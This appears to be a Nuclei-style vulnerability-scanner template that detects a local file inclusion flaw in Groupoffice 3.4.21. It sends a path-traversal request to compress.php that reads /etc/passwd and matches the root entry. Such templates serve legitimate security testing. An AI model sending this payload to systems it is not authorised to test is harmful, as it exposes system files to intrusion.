id: groupoffice-lfi

info:
  name: Groupoffice 3.4.21 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Groupoffice 3.4.21 is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2018020249
    - http://www.group-office.com
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: groupoffice,lfi,traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a004730450221008019abe3bb9c706e393f7e123e706685a5aee7b6e1e76700c8165002af6f95b302200b2fbc02ad4ae85ed8724953d3327e3a074463af14c07445c31734d74639ae4f:922c64590222798bb761d5b6d8e72950
